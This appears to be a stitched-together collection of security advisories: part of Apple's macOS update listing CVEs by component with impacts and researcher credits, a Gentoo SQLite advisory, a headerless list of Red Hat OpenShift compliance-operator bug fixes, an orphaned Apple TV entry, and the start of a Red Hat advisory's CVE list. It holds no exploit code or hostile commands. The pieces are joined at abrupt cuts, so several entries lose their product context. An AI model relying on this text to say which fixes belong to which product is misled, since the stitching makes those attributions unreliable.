(Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: Processing a maliciously crafted font file may lead to arbitrary code execution Description: A memory corruption issue existed in the processing of font files. This issue was addressed with improved input validation. CVE-2020-27931: Apple Entry added December 14, 2020 FontParser Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: Processing a maliciously crafted font may lead to arbitrary code execution. Apple is aware of reports that an exploit for this issue exists in the wild. Description: A memory corruption issue was addressed with improved input validation. CVE-2020-27930: Google Project Zero FontParser Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: Processing a maliciously crafted font file may lead to arbitrary code execution Description: An out-of-bounds write issue was addressed with improved bounds checking. CVE-2020-27927: Xingwei Lin of Ant Security Light-Year Lab Foundation Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: A local user may be able to read arbitrary files Description: A logic issue was addressed with improved state management. CVE-2020-10002: James Hutchins HomeKit Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: An attacker in a privileged network position may be able to unexpectedly alter application state Description: This issue was addressed with improved setting propagation. CVE-2020-9978: Luyi Xing, Dongfang Zhao, and Xiaofeng Wang of Indiana University Bloomington, Yan Jia of Xidian University and University of Chinese Academy of Sciences, and Bin Yuan of HuaZhong University of Science and Technology Entry added December 14, 2020 ImageIO Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: Processing a maliciously crafted image may lead to arbitrary code execution Description: An out-of-bounds write issue was addressed with improved bounds checking. CVE-2020-9955: Mickey Jin of Trend Micro, Xingwei Lin of Ant Security Light-Year Lab Entry added December 14, 2020 ImageIO Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: Processing a maliciously crafted image may lead to arbitrary code execution Description: An out-of-bounds read was addressed with improved input validation. CVE-2020-27924: Lei Sun Entry added December 14, 2020 ImageIO Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: Processing a maliciously crafted image may lead to arbitrary code execution Description: An out-of-bounds write was addressed with improved input validation. CVE-2020-27912: Xingwei Lin of Ant Security Light-Year Lab CVE-2020-27923: Lei Sun Entry updated December 14, 2020 ImageIO Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: Opening a maliciously crafted PDF file may lead to an unexpected application termination or arbitrary code execution Description: An out-of-bounds write issue was addressed with improved bounds checking. CVE-2020-9876: Mickey Jin of Trend Micro Intel Graphics Driver Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: An application may be able to execute arbitrary code with kernel privileges Description: An out-of-bounds write issue was addressed with improved bounds checking. CVE-2020-10015: ABC Research s.r.o. working with Trend Micro Zero Day Initiative CVE-2020-27897: Xiaolong Bai and Min (Spark) Zheng of Alibaba Inc., and Luyi Xing of Indiana University Bloomington Entry added December 14, 2020 Intel Graphics Driver Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: An application may be able to execute arbitrary code with kernel privileges Description: A memory corruption issue was addressed with improved memory handling. CVE-2020-27907: ABC Research s.r.o. working with Trend Micro Zero Day Initiative Entry added December 14, 2020 Image Processing Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: Processing a maliciously crafted image may lead to arbitrary code execution Description: An out-of-bounds write was addressed with improved input validation. CVE-2020-27919: Hou JingYi (@hjy79425575) of Qihoo 360 CERT, Xingwei Lin of Ant Security Light-Year Lab Entry added December 14, 2020 Kernel Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: A remote attacker may be able to cause unexpected system termination or corrupt kernel memory Description: Multiple memory corruption issues were addressed with improved input validation. CVE-2020-9967: Alex Plaskett (@alexjplaskett) Entry added December 14, 2020 Kernel Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: An application may be able to execute arbitrary code with kernel privileges Description: A use after free issue was addressed with improved memory management. CVE-2020-9975: Tielei Wang of Pangu Lab Entry added December 14, 2020 Kernel Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: An application may be able to execute arbitrary code with kernel privileges Description: A race condition was addressed with improved state handling. CVE-2020-27921: Linus Henze (pinauten.de) Entry added December 14, 2020 Kernel Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: An application may be able to execute arbitrary code with kernel privileges Description: A logic issue existed resulting in memory corruption. This was addressed with improved state management. CVE-2020-27904: Zuozhi Fan (@pattern_F_) of Ant Group Tianqong Security Lab Kernel Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: An attacker in a privileged network position may be able to inject into active connections within a VPN tunnel Description: A routing issue was addressed with improved restrictions. CVE-2019-14899: William J. Tolley, Beau Kujath, and Jedidiah R. Crandall Kernel Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: A malicious application may be able to disclose kernel memory. Apple is aware of reports that an exploit for this issue exists in the wild. Description: A memory initialization issue was addressed. CVE-2020-27950: Google Project Zero Kernel Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: A malicious application may be able to determine kernel memory layout Description: A logic issue was addressed with improved state management. CVE-2020-9974: Tommy Muir (@Muirey03) Kernel Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: An application may be able to execute arbitrary code with kernel privileges Description: A memory corruption issue was addressed with improved state management. CVE-2020-10016: Alex Helie Kernel Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: A malicious application may be able to execute arbitrary code with kernel privileges. Apple is aware of reports that an exploit for this issue exists in the wild. Description: A type confusion issue was addressed with improved state handling. CVE-2020-27932: Google Project Zero libxml2 Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: Processing maliciously crafted web content may lead to code execution Description: A use after free issue was addressed with improved memory management. CVE-2020-27917: found by OSS-Fuzz CVE-2020-27920: found by OSS-Fuzz Entry updated December 14, 2020 libxml2 Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: A remote attacker may be able to cause unexpected application termination or arbitrary code execution Description: An integer overflow was addressed through improved input validation. CVE-2020-27911: found by OSS-Fuzz libxpc Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: A malicious application may be able to elevate privileges Description: A logic issue was addressed with improved validation. CVE-2020-9971: Zhipeng Huo (@R3dF09) of Tencent Security Xuanwu Lab Entry added December 14, 2020 libxpc Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: A malicious application may be able to break out of its sandbox Description: A parsing issue in the handling of directory paths was addressed with improved path validation. CVE-2020-10014: Zhipeng Huo (@R3dF09) of Tencent Security Xuanwu Lab Logging Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: A local attacker may be able to elevate their privileges Description: A path handling issue was addressed with improved validation. CVE-2020-10010: Tommy Muir (@Muirey03) Mail Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: A remote attacker may be able to unexpectedly alter application state Description: This issue was addressed with improved checks. CVE-2020-9941: Fabian Ising of FH Münster University of Applied Sciences and Damian Poddebniak of FH Münster University of Applied Sciences Messages Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: A local user may be able to discover a user’s deleted messages Description: The issue was addressed with improved deletion. CVE-2020-9988: William Breuer of the Netherlands CVE-2020-9989: von Brunn Media Model I/O Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: Processing a maliciously crafted USD file may lead to unexpected application termination or arbitrary code execution Description: An out-of-bounds read was addressed with improved bounds checking. CVE-2020-10011: Aleksandar Nikolic of Cisco Talos Entry added December 14, 2020 Model I/O Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: Processing a maliciously crafted USD file may lead to unexpected application termination or arbitrary code execution Description: An out-of-bounds read was addressed with improved input validation. CVE-2020-13524: Aleksandar Nikolic of Cisco Talos Model I/O Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: Opening a maliciously crafted file may lead to unexpected application termination or arbitrary code execution Description: A logic issue was addressed with improved state management. CVE-2020-10004: Aleksandar Nikolic of Cisco Talos NetworkExtension Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: A malicious application may be able to elevate privileges Description: A use after free issue was addressed with improved memory management. CVE-2020-9996: Zhiwei Yuan of Trend Micro iCore Team, Junzhi Lu and Mickey Jin of Trend Micro NSRemoteView Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: A sandboxed process may be able to circumvent sandbox restrictions Description: A logic issue was addressed with improved restrictions. CVE-2020-27901: Thijs Alkemade of Computest Research Division Entry added December 14, 2020 NSRemoteView Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: A malicious application may be able to preview files it does not have access to Description: An issue existed in the handling of snapshots. The issue was resolved with improved permissions logic. CVE-2020-27900: Thijs Alkemade of Computest Research Division PCRE Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: Multiple issues in pcre Description: Multiple issues were addressed by updating to version 8.44. CVE-2019-20838 CVE-2020-14155 Power Management Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: A malicious application may be able to determine kernel memory layout Description: A logic issue was addressed with improved state management. CVE-2020-10007: singi@theori working with Trend Micro Zero Day Initiative python Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: Cookies belonging to one origin may be sent to another origin Description: Multiple issues were addressed with improved logic. CVE-2020-27896: an anonymous researcher Quick Look Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: A malicious app may be able to determine the existence of files on the computer Description: The issue was addressed with improved handling of icon caches. CVE-2020-9963: Csaba Fitzl (@theevilbit) of Offensive Security Quick Look Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: Processing a maliciously crafted document may lead to a cross site scripting attack Description: An access issue was addressed with improved access restrictions. CVE-2020-10012: Heige of KnownSec 404 Team (https://www.knownsec.com/) and Bo Qu of Palo Alto Networks (https://www.paloaltonetworks.com/) Ruby Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: A remote attacker may be able to modify the file system Description: A path handling issue was addressed with improved validation. CVE-2020-27896: an anonymous researcher Ruby Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: When parsing certain JSON documents, the json gem can be coerced into creating arbitrary objects in the target system Description: This issue was addressed with improved checks. CVE-2020-10663: Jeremy Evans Safari Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: Visiting a malicious website may lead to address bar spoofing Description: A spoofing issue existed in the handling of URLs. This issue was addressed with improved input validation. CVE-2020-9945: Narendra Bhati From Suma Soft Pvt. Ltd. Pune (India) @imnarendrabhati Safari Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: A malicious application may be able to determine a user's open tabs in Safari Description: A validation issue existed in the entitlement verification. This issue was addressed with improved validation of the process entitlement. CVE-2020-9977: Josh Parnham (@joshparnham) Safari Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: Visiting a malicious website may lead to address bar spoofing Description: An inconsistent user interface issue was addressed with improved state management. CVE-2020-9942: an anonymous researcher, Rahul d Kankrale (servicenger.com), Rayyan Bijoora (@Bijoora) of The City School, PAF Chapter, Ruilin Yang of Tencent Security Xuanwu Lab, YoKo Kho (@YoKoAcc) of PT Telekomunikasi Indonesia (Persero) Tbk, Zhiyang Zeng(@Wester) of OPPO ZIWU Security Lab Sandbox Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: A local user may be able to view senstive user information Description: An access issue was addressed with additional sandbox restrictions. CVE-2020-9969: Wojciech Reguła of SecuRing (wojciechregula.blog) SQLite Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: A remote attacker may be able to cause a denial of service Description: This issue was addressed with improved checks. CVE-2020-9991 SQLite Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: A remote attacker may be able to leak memory Description: An information disclosure issue was addressed with improved state management. CVE-2020-9849 SQLite Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: Multiple issues in SQLite Description: Multiple issues were addressed by updating SQLite to version 3.32.3. CVE-2020-15358 SQLite Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: A maliciously crafted SQL query may lead to data corruption Description: This issue was addressed with improved checks. CVE-2020-13631 SQLite Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: A remote attacker may be able to cause a denial of service Description: This issue was addressed with improved checks. CVE-2020-13434 CVE-2020-13435 CVE-2020-9991 SQLite Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: A remote attacker may be able to cause arbitrary code execution Description: A memory corruption issue was addressed with improved state management. CVE-2020-13630 Symptom Framework Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: A local attacker may be able to elevate their privileges Description: A use after free issue was addressed with improved memory management. CVE-2020-27899: 08Tc3wBB working with ZecOps Entry added December 14, 2020 System Preferences Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: A sandboxed process may be able to circumvent sandbox restrictions Description: A logic issue was addressed with improved state management. CVE-2020-10009: Thijs Alkemade of Computest Research Division TCC Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: A malicious application with root privileges may be able to access private information Description: A logic issue was addressed with improved restrictions. CVE-2020-10008: Wojciech Reguła of SecuRing (wojciechregula.blog) Entry added December 14, 2020 WebKit Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: Processing maliciously crafted web content may lead to arbitrary code execution Description: A use after free issue was addressed with improved memory management. CVE-2020-27918: Liu Long of Ant Security Light-Year Lab Entry updated December 14, 2020 Wi-Fi Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: An attacker may be able to bypass Managed Frame Protection Description: A denial of service issue was addressed with improved state handling. CVE-2020-27898: Stephan Marais of University of Johannesburg Xsan Available for: Mac Pro (2013 and later), MacBook Air (2013 and later), MacBook Pro (Late 2013 and later), Mac mini (2014 and later), iMac (2014 and later), MacBook (2015 and later), iMac Pro (all models) Impact: A malicious application may be able to access restricted files Description: This issue was addressed with improved entitlements. CVE-2020-10006: Wojciech Reguła (@_r3ggi) of SecuRing Additional recognition 802.1X We would like to acknowledge Kenana Dalle of Hamad bin Khalifa University and Ryan Riley of Carnegie Mellon University in Qatar for their assistance. Entry added December 14, 2020 Audio We would like to acknowledge JunDong Xie and XingWei Lin of Ant- financial Light-Year Security Lab, an anonymous researcher for their assistance. Bluetooth We would like to acknowledge Andy Davis of NCC Group, Dennis Heinze (@ttdennis) of TU Darmstadt, Secure Mobile Networking Lab for their assistance. Entry updated December 14, 2020 Clang We would like to acknowledge Brandon Azad of Google Project Zero for their assistance. Core Location We would like to acknowledge Yiğit Can YILMAZ (@yilmazcanyigit) for their assistance. Crash Reporter We would like to acknowledge Artur Byszko of AFINE for their assistance. Entry added December 14, 2020 Directory Utility We would like to acknowledge Wojciech Reguła (@_r3ggi) of SecuRing for their assistance. iAP We would like to acknowledge Andy Davis of NCC Group for their assistance. Kernel We would like to acknowledge Brandon Azad of Google Project Zero, Stephen Röttger of Google for their assistance. libxml2 We would like to acknowledge an anonymous researcher for their assistance. Entry added December 14, 2020 Login Window We would like to acknowledge Rob Morton of Leidos for their assistance. Photos Storage We would like to acknowledge Paulos Yibelo of LimeHats for their assistance. Quick Look We would like to acknowledge Csaba Fitzl (@theevilbit) and Wojciech Reguła of SecuRing (wojciechregula.blog) for their assistance. Safari We would like to acknowledge Gabriel Corona and Narendra Bhati From Suma Soft Pvt. Ltd. Pune (India) @imnarendrabhati for their assistance. Security We would like to acknowledge Christian Starkjohann of Objective Development Software GmbH for their assistance. System Preferences We would like to acknowledge Csaba Fitzl (@theevilbit) of Offensive Security for their assistance. This message is signed with Apple's Product Security PGP key, and details are available at: https://www.apple.com/support/security/pgp/ -----BEGIN PGP SIGNATURE----- iQIzBAEBCAAdFiEEbURczHs1TP07VIfuZcsbuWJ6jjAFAl/YDPwACgkQZcsbuWJ6 jjANmhAAoj+ZHNnH2pGDFl2/jrAtvWBtXg8mqw6NtNbGqWDZFhnY5q7Lp8WTx/Pi x64A4F8bU5xcybnmaDpK5PMwAAIiAg4g1BhpOq3pGyeHEasNx7D9damfqFGKiivS p8nl62XE74ayfxdZGa+2tOVFTFwqixfr0aALVoQUhAWNeYuvVSgJXlgdGjj+QSL+ 9vW86kbQypOqT5TPDg6tpJy3g5s4hotkfzCfxA9mIKOg5e/nnoRNhw0c1dzfeTRO INzGxnajKGGYy2C3MH6t0cKG0B6cH7aePZCHYJ1jmuAVd0SD3PfmoT76DeRGC4Ri c8fGD+5pvSF6/+5E+MbH3t3D6bLiCGRFJtYNMpr46gUKKt27EonSiheYCP9xR6lU ChpYdcgHMOHX4a07/Oo8vEwQrtJ4JryhI9tfBel1ewdSoxk2iCFKzLLYkDMihD6B 1x/9MlaqEpLYBnuKkrRzFINW23TzFPTI/+i2SbUscRQtK0qE7Up5C+IUkRvBGhEs MuEmEnn5spnVG2EBcKeLtJxtf/h5WaRFrev72EvSVR+Ko8Cj0MgK6IATu6saq8bV kURL5empvpexFAvVQWRDaLgGBHKM+uArBz2OP6t7wFvD2p1Vq5M+dMrEPna1JO/S AXZYC9Y9bBRZfYQAv7nxa+uIXy2rGTuQKQY8ldu4eEHtJ0OhaB8= =T5Y8 -----END PGP SIGNATURE----- . - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 202007-26 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - https://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: SQLite: Multiple vulnerabilities Date: July 27, 2020 Bugs: #716748 ID: 202007-26 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis ======= Multiple vulnerabilities have been found in SQLite, the worst of which could result in the arbitrary execution of code. Background ========= SQLite is a C library that implements an SQL database engine. Affected packages ================ ------------------------------------------------------------------- Package / Vulnerable / Unaffected ------------------------------------------------------------------- 1 dev-db/sqlite < 3.32.3 >= 3.32.3 Description ========== Multiple vulnerabilities have been discovered in SQLite. Please review the CVE identifiers referenced below for details. Impact ===== Please review the referenced CVE identifiers for details. Workaround ========= There is no known workaround at this time. Resolution ========= All SQLite users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">\xdev-db/sqlite-3.32.3" References ========= [ 1 ] CVE-2019-20218 https://nvd.nist.gov/vuln/detail/CVE-2019-20218 [ 2 ] CVE-2020-11655 https://nvd.nist.gov/vuln/detail/CVE-2020-11655 [ 3 ] CVE-2020-11656 https://nvd.nist.gov/vuln/detail/CVE-2020-11656 [ 4 ] CVE-2020-13434 https://nvd.nist.gov/vuln/detail/CVE-2020-13434 [ 5 ] CVE-2020-13435 https://nvd.nist.gov/vuln/detail/CVE-2020-13435 [ 6 ] CVE-2020-13630 https://nvd.nist.gov/vuln/detail/CVE-2020-13630 [ 7 ] CVE-2020-13631 https://nvd.nist.gov/vuln/detail/CVE-2020-13631 [ 8 ] CVE-2020-13632 https://nvd.nist.gov/vuln/detail/CVE-2020-13632 [ 9 ] CVE-2020-13871 https://nvd.nist.gov/vuln/detail/CVE-2020-13871 [ 10 ] CVE-2020-15358 https://nvd.nist.gov/vuln/detail/CVE-2020-15358 Availability =========== This GLSA and any updates to it are available for viewing at the Gentoo Security Website: https://security.gentoo.org/glsa/202007-26 Concerns? ======== Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org. License ====== Copyright 2020 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. https://creativecommons.org/licenses/by-sa/2.5 . Bug Fix(es): * Aggregator pod tries to parse ConfigMaps without results (BZ#1899479) * The compliancesuite object returns error with ocp4-cis tailored profile (BZ#1902251) * The compliancesuite does not trigger when there are multiple rhcos4 profiles added in scansettingbinding object (BZ#1902634) * [OCP v46] Not all remediations get applied through machineConfig although the status of all rules shows Applied in ComplianceRemediations object (BZ#1907414) * The profile parser pod deployment and associated profiles should get removed after upgrade the compliance operator (BZ#1908991) * Applying the "rhcos4-moderate" compliance profile leads to Ignition error "something else exists at that path" (BZ#1909081) * [OCP v46] Always update the default profilebundles on Compliance operator startup (BZ#1909122) 3. Bugs fixed (https://bugzilla.redhat.com/): 1899479 - Aggregator pod tries to parse ConfigMaps without results 1902111 - CVE-2020-27813 golang-github-gorilla-websocket: integer overflow leads to denial of service 1902251 - The compliancesuite object returns error with ocp4-cis tailored profile 1902634 - The compliancesuite does not trigger when there are multiple rhcos4 profiles added in scansettingbinding object 1907414 - [OCP v46] Not all remediations get applied through machineConfig although the status of all rules shows Applied in ComplianceRemediations object 1908991 - The profile parser pod deployment and associated profiles should get removed after upgrade the compliance operator 1909081 - Applying the "rhcos4-moderate" compliance profile leads to Ignition error "something else exists at that path" 1909122 - [OCP v46] Always update the default profilebundles on Compliance operator startup 5. Assets Available for: Apple TV 4K and Apple TV HD Impact: An attacker may be able to misuse a trust relationship to download malicious content Description: A trust issue was addressed by removing a legacy API. CVE-2020-9976: Rias A. Entry added November 12, 2020 Installation note: Apple TV will periodically check for software updates. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 ==================================================================== Red Hat Security Advisory Synopsis: Moderate: OpenShift Container Platform 4.7.0 extras and security update Advisory ID: RHSA-2020:5635-01 Product: Red Hat OpenShift Enterprise Advisory URL: https://access.redhat.com/errata/RHSA-2020:5635 Issue date: 2021-02-24 CVE Names: CVE-2018-20843 CVE-2019-3884 CVE-2019-5018 CVE-2019-8625 CVE-2019-8710 CVE-2019-8720 CVE-2019-8743 CVE-2019-8764 CVE-2019-8766 CVE-2019-8769 CVE-2019-8771 CVE-2019-8782 CVE-2019-8783 CVE-2019-8808 CVE-2019-8811 CVE-2019-8812 CVE-2019-8813 CVE-2019-8814 CVE-2019-8815 CVE-2019-8816 CVE-2019-8819 CVE-2019-8820 CVE-2019-8823 CVE-2019-8835 CVE-2019-8844 CVE-2019-8846 CVE-2019-13050 CVE-2019-13225 CVE-2019-13627 CVE-2019-14889 CVE-2019-15165 CVE-2019-15903 CVE-2019-16168 CVE-2019-16935 CVE-2019-17450 CVE-2019-17546 CVE-2019-19221 CVE-2019-19906 CVE-2019-19956 CVE-2019-20218 CVE-2019-20387 CVE-2019-20388 CVE-2019-20454 CVE-2019-20807 CVE-2019-20907 CVE-2019-20916 CVE-2020-1730 CVE-2020-1751 CVE-2020-1752 CVE-2020-1971 CVE-2020-3862 CVE-2020-3864 CVE-2020-3865 CVE-2020-3867 CVE-2020-3868 CVE-2020-3885 CVE-2020-3894 CVE-2020-3895 CVE-2020-3897 CVE-2020-3898 CVE-2020-3899 CVE-2020-3900 CVE-2020-3901 CVE-2020-3902 CVE-2020-6405 CVE-2020-7595 CVE-2020-8492 CVE-2020-8566 CVE-2020-8619 CVE-2020-8622 CVE-2020-8623 CVE-2020-8624 CVE-2020-9327 CVE-2020-9802 CVE-2020-9803 CVE-2020-9805 CVE-2020-9806 CVE-2020-9807 CVE-2020-9843 CVE-2020-9850 CVE-2020-9862 CVE-2020-9893 CVE-2020-9894 CVE-2020-9895 CVE-2020-9915 CVE-2020-9925 CVE-2020-10018 CVE-2020-10029 CVE-2020-11793 CVE-2020-13630 CVE-2020-13631 CVE-2020-13632 